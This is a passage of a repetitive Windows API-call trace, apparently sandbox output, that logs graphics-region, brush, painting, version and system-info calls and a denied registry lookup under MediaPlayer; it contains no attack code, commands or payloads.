hrgnSrc1=0xb0401d0, hrgnSrc2=0xd0401cd, iMode=1) returned 1 [0087.870] CombineRgn (hrgnDst=0x1040d12, hrgnSrc1=0xb0401d0, hrgnSrc2=0xd0401cd, iMode=4) returned 2 [0087.870] CreateSolidBrush (color=0xff) returned 0x2100d10 [0087.870] CreateSolidBrush (color=0xff0000) returned 0x1100d13 [0087.870] DeleteObject (ho=0x1100d13) returned 1 [0087.870] DeleteObject (ho=0xd0401cd) returned 1 [0087.870] DeleteObject (ho=0xb0401d0) returned 1 [0087.870] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.870] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.870] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.870] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.870] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.870] BeginPath (hdc=0x0) returned 0 [0087.870] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.870] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.870] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.870] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.870] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.870] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.870] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.871] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.871] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe0401cd [0087.871] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc0401d0 [0087.871] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d14 [0087.871] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d15 [0087.871] CombineRgn (hrgnDst=0x1040d14, hrgnSrc1=0xe0401cd, hrgnSrc2=0xc0401d0, iMode=1) returned 1 [0087.871] CombineRgn (hrgnDst=0x1040d15, hrgnSrc1=0xe0401cd, hrgnSrc2=0xc0401d0, iMode=4) returned 2 [0087.871] CreateSolidBrush (color=0xff) returned 0x2100d13 [0087.871] CreateSolidBrush (color=0xff0000) returned 0x1100d16 [0087.871] DeleteObject (ho=0x1100d16) returned 1 [0087.871] DeleteObject (ho=0xc0401d0) returned 1 [0087.871] DeleteObject (ho=0xe0401cd) returned 1 [0087.871] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.871] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.871] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.871] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.871] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.871] BeginPath (hdc=0x0) returned 0 [0087.871] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.871] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.871] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.871] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.871] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.871] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.871] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.871] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.871] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd0401d0 [0087.871] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf0401cd [0087.871] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d17 [0087.871] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d18 [0087.871] CombineRgn (hrgnDst=0x1040d17, hrgnSrc1=0xd0401d0, hrgnSrc2=0xf0401cd, iMode=1) returned 1 [0087.872] CombineRgn (hrgnDst=0x1040d18, hrgnSrc1=0xd0401d0, hrgnSrc2=0xf0401cd, iMode=4) returned 2 [0087.872] CreateSolidBrush (color=0xff) returned 0x2100d16 [0087.872] CreateSolidBrush (color=0xff0000) returned 0x1100d19 [0087.872] DeleteObject (ho=0x1100d19) returned 1 [0087.872] DeleteObject (ho=0xf0401cd) returned 1 [0087.872] DeleteObject (ho=0xd0401d0) returned 1 [0087.872] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.872] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.872] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.872] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.872] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.872] BeginPath (hdc=0x0) returned 0 [0087.872] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.872] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.872] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.872] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.872] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.872] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.872] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.872] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x100401cd [0087.872] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe0401d0 [0087.872] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d1a [0087.872] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d1b [0087.872] CombineRgn (hrgnDst=0x1040d1a, hrgnSrc1=0x100401cd, hrgnSrc2=0xe0401d0, iMode=1) returned 1 [0087.872] CombineRgn (hrgnDst=0x1040d1b, hrgnSrc1=0x100401cd, hrgnSrc2=0xe0401d0, iMode=4) returned 2 [0087.872] CreateSolidBrush (color=0xff) returned 0x2100d19 [0087.872] CreateSolidBrush (color=0xff0000) returned 0x1100d1c [0087.872] DeleteObject (ho=0x1100d1c) returned 1 [0087.872] DeleteObject (ho=0xe0401d0) returned 1 [0087.872] DeleteObject (ho=0x100401cd) returned 1 [0087.872] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.872] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.872] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.872] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.872] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.872] BeginPath (hdc=0x0) returned 0 [0087.872] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.873] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.873] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.873] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.873] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.873] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.873] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.873] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.873] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf0401d0 [0087.873] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x110401cd [0087.873] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d1d [0087.873] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d1e [0087.873] CombineRgn (hrgnDst=0x1040d1d, hrgnSrc1=0xf0401d0, hrgnSrc2=0x110401cd, iMode=1) returned 1 [0087.873] CombineRgn (hrgnDst=0x1040d1e, hrgnSrc1=0xf0401d0, hrgnSrc2=0x110401cd, iMode=4) returned 2 [0087.873] CreateSolidBrush (color=0xff) returned 0x2100d1c [0087.873] CreateSolidBrush (color=0xff0000) returned 0x1100d1f [0087.873] DeleteObject (ho=0x1100d1f) returned 1 [0087.873] DeleteObject (ho=0x110401cd) returned 1 [0087.873] DeleteObject (ho=0xf0401d0) returned 1 [0087.873] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.873] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.873] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.873] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.873] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.873] BeginPath (hdc=0x0) returned 0 [0087.873] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.873] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.873] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.873] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.873] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.873] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.873] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.873] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.873] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x120401cd [0087.873] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x100401d0 [0087.874] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d20 [0087.874] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d21 [0087.874] CombineRgn (hrgnDst=0x1040d20, hrgnSrc1=0x120401cd, hrgnSrc2=0x100401d0, iMode=1) returned 1 [0087.874] CombineRgn (hrgnDst=0x1040d21, hrgnSrc1=0x120401cd, hrgnSrc2=0x100401d0, iMode=4) returned 2 [0087.874] CreateSolidBrush (color=0xff) returned 0x2100d1f [0087.874] CreateSolidBrush (color=0xff0000) returned 0x1100d22 [0087.874] DeleteObject (ho=0x1100d22) returned 1 [0087.874] DeleteObject (ho=0x100401d0) returned 1 [0087.874] DeleteObject (ho=0x120401cd) returned 1 [0087.874] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.874] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.874] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.874] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.874] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.874] BeginPath (hdc=0x0) returned 0 [0087.874] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.874] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.874] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.874] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.874] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.874] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.874] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.874] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.874] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x110401d0 [0087.874] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x130401cd [0087.874] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d23 [0087.874] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d24 [0087.874] CombineRgn (hrgnDst=0x1040d23, hrgnSrc1=0x110401d0, hrgnSrc2=0x130401cd, iMode=1) returned 1 [0087.874] CombineRgn (hrgnDst=0x1040d24, hrgnSrc1=0x110401d0, hrgnSrc2=0x130401cd, iMode=4) returned 2 [0087.874] CreateSolidBrush (color=0xff) returned 0x2100d22 [0087.874] CreateSolidBrush (color=0xff0000) returned 0x1100d25 [0087.874] DeleteObject (ho=0x1100d25) returned 1 [0087.874] DeleteObject (ho=0x130401cd) returned 1 [0087.874] DeleteObject (ho=0x110401d0) returned 1 [0087.874] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.874] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.874] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.875] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.875] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.875] BeginPath (hdc=0x0) returned 0 [0087.875] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.875] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.875] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.875] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.875] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.875] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.875] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.875] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.875] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x140401cd [0087.875] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x120401d0 [0087.875] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d26 [0087.875] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d27 [0087.875] CombineRgn (hrgnDst=0x1040d26, hrgnSrc1=0x140401cd, hrgnSrc2=0x120401d0, iMode=1) returned 1 [0087.875] CombineRgn (hrgnDst=0x1040d27, hrgnSrc1=0x140401cd, hrgnSrc2=0x120401d0, iMode=4) returned 2 [0087.875] CreateSolidBrush (color=0xff) returned 0x2100d25 [0087.875] CreateSolidBrush (color=0xff0000) returned 0x1100d28 [0087.875] DeleteObject (ho=0x1100d28) returned 1 [0087.875] DeleteObject (ho=0x120401d0) returned 1 [0087.875] DeleteObject (ho=0x140401cd) returned 1 [0087.875] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.875] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.875] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.875] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.875] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.875] BeginPath (hdc=0x0) returned 0 [0087.875] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.875] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.875] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.875] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.875] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.875] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.876] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.876] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.876] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x130401d0 [0087.876] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x150401cd [0087.876] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d29 [0087.876] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d2a [0087.876] CombineRgn (hrgnDst=0x1040d29, hrgnSrc1=0x130401d0, hrgnSrc2=0x150401cd, iMode=1) returned 1 [0087.876] CombineRgn (hrgnDst=0x1040d2a, hrgnSrc1=0x130401d0, hrgnSrc2=0x150401cd, iMode=4) returned 2 [0087.876] CreateSolidBrush (color=0xff) returned 0x2100d28 [0087.876] CreateSolidBrush (color=0xff0000) returned 0x1100d2b [0087.876] DeleteObject (ho=0x1100d2b) returned 1 [0087.876] DeleteObject (ho=0x150401cd) returned 1 [0087.876] DeleteObject (ho=0x130401d0) returned 1 [0087.876] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.876] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.876] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.876] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.876] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.876] BeginPath (hdc=0x0) returned 0 [0087.876] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.876] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.876] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.876] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.876] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.876] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.876] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.876] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.876] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x160401cd [0087.876] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x140401d0 [0087.876] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d2c [0087.876] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d2d [0087.876] CombineRgn (hrgnDst=0x1040d2c, hrgnSrc1=0x160401cd, hrgnSrc2=0x140401d0, iMode=1) returned 1 [0087.877] CombineRgn (hrgnDst=0x1040d2d, hrgnSrc1=0x160401cd, hrgnSrc2=0x140401d0, iMode=4) returned 2 [0087.877] CreateSolidBrush (color=0xff) returned 0x2100d2b [0087.877] CreateSolidBrush (color=0xff0000) returned 0x1100d2e [0087.877] DeleteObject (ho=0x1100d2e) returned 1 [0087.877] DeleteObject (ho=0x140401d0) returned 1 [0087.877] DeleteObject (ho=0x160401cd) returned 1 [0087.877] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.877] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, 